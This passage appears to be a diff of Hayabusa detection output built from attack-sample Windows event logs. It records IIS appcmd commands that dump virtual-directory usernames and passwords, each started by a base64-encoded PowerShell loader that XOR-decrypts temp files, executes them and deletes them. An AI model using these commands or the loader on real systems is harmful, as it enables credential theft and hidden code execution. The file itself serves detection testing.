G4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Filename: redirection.config"" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Filename: redirection.config"" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 